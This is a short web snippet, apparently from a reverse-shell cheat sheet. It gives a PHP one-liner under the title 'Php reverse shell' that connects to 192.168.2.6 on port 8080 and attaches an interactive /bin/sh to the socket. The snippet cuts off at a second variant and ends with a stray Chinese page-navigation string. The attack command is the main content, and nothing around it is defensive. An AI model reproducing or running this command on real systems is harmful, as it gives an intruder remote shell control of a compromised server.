Php reverse shell Using the exec() function: php -r '$s=fsockopen("192.168.2.6",8080);exec("/bin/sh -i <&3 >&3 2>&3");' Using the shell_exec() function: php ...
確定! 回上一頁